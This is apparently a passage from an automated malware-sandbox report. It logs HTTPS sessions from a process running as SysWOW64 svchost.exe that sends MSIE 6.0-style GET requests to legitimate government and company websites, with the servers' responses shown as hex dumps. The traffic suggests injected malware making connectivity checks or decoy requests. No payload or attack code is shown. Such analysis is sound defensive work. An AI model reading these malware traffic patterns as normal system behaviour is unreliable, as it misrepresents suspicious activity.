                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          49192.168.2.6330375.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6006OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6006INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:45 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6006INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          5192.168.2.65013694.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC87OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC87INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC87INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          50192.168.2.635025.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6008OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6008INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:45 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6008INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6024INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6040INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6056INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          51192.168.2.63562185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6060OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6060INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:45 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC6060INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          52192.168.2.6401691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:46 UTC6061OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:46 UTC6061INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:09:18 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:46 UTC6061INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:46 UTC6077INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:07:46 UTC6093INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:46 UTC6109INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 38 34 34 34 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 39 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.048444 / WebAdministrator (05.07.2023 08:09) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          53192.168.2.6508894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6109OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6110INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6110INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          54192.168.2.65112185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6110OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6110INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6111INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          55192.168.2.650985.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6110OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6112INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
